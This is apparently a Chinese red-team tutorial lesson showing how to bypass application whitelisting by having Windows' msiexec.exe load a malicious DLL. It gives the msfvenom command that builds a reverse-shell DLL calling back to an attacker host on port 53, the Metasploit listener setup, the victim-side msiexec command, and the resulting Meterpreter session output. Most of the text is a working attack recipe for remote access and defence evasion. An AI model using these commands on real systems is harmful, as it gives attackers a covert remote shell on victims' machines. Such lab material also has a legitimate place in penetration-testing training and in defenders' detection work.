# 第八十六课：基于白名单Msiexec执行payload第八季补充

**注：**&#x8BF7;多喝点热水或者凉白开，身体特别重要。

本季补充本地DLL加载\
**Msiexec简介：**

Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包（MSI）,一般在运行Microsoft Update安装更新或安装部分软件的时候出现，占用内存比较大。并且集成于Windows 2003，Windows 7等。

**说明：**&#x4D;siexec.exe所在路径已被系统添加PATH环境变量中，因此，Msiexec命令可识别。

## 基于白名单Msiexec.exe配置payload：

**注：x64 payload**

```bash
msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐ f dll > Micropoor_rev_x64_53.dll
```

## 配置攻击机msf：

**注：x64 payload**

```bash
msf exploit(multi/handler) > show options 

Module options (exploit/multi/handler): 

Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ 

Payload options (windows/x64/meterpreter/reverse_tcp): 

Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process,none)

LHOST 192.168.1.4 yes The listen address (an interface may be specified)

LPORT 53 yes The listen port

Exploit target: 

Id Name
‐‐ ‐‐‐‐
0 Wildcard Target 

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.4:53
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZJxBUCLwDNSFSVcJqT%2F62736d164fb64b1462810cfea7bd472c.jpg?generation=1551066078137975\&alt=media)

## 靶机执行：

```bash
msiexec /y C:\Users\John\Desktop\Micropoor_rev_x64_dll.dll
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZJxBUJ-VVU8n80Opb1%2Fb8cbb9334f2281d8cd8f70052c2a02a9.jpg?generation=1551066081360678\&alt=media)

```bash
msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.4:53

[*] Sending stage (206403 bytes) to 192.168.1.5

[*] Meterpreter session 26 opened (192.168.1.4:53 ‐> 192.168.1.5:11543)
at 2019‐01‐20 09:45:51 ‐0500

meterpreter > getuid

Server username: John‐PC\John

meterpreter > getpid

Current pid: 7672

meterpreter >
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZJxBUeQeKygC2p58c9%2F84fb0dd629aae878607221e385dfff34.jpg?generation=1551066050228853\&alt=media)

> Micropoor